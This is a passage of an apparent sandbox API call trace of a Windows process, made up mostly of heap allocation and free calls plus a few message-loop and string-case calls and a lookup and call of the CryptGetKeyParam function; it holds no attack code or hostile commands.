wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0173.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0173.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0173.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0173.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0173.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0173.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0173.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0173.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0173.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0173.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0173.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0173.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0173.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0173.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0173.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0173.476] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0173.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0173.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0173.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0173.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0173.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0173.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0173.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0173.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0173.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0173.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0173.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0173.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0173.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0173.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0173.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0173.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0173.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0173.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0173.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0173.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0173.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0173.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0173.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0173.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.476] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0173.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0173.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0173.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0173.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0173.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0173.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0173.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0173.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0173.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0173.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0173.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0173.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0173.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0173.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0173.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0173.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0173.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0173.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0173.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0173.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0173.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0173.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0173.481] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0173.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0173.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0173.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0173.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0173.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0173.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0173.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0173.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0173.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0173.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0173.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0173.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.482] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0173.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0173.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd768 [0173.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0173.482] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0173.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0173.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0173.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0173.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0173.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0173.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0173.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0173.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0173.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0173.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0173.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0173.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0173.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0173.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0173.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0173.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0173.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0173.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0173.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0173.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0173.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0173.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0173.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0173.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0173.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0173.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0173.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0173.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0173.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0173.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0173.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0173.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0173.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0173.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0173.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0173.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0173.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0173.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0173.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0173.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0173.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0173.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0173.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0173.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0173.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0173.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0173.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0173.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0173.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0173.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0173.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0173.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0173.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0173.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0173.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0173.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0173.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0173.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0173.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0173.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0173.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0173.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0173.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0173.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0173.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0173.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0173.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0173.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0173.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0173.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0173.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0173.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0173.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0173.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0173.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0173.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0173.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0173.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0173.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0173.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0173.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0173.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0173.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0173.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0173.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0173.485] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0173.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0173.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0173.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0173.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0173.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0173.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0173.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0173.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0173.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0173.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0173.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0173.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0173.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0173.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0173.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0173.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0173.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0173.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0173.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0173.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0173.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0173.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0173.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0173.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0173.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0173.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0173.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0173.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0173.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0173.486] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0173.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0173.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0173.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0173.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0173.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0173.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0173.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0173.487] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2808, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2808*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0173.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0173.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0173.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0173.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0173.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0173.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.487] HeapFree (in: 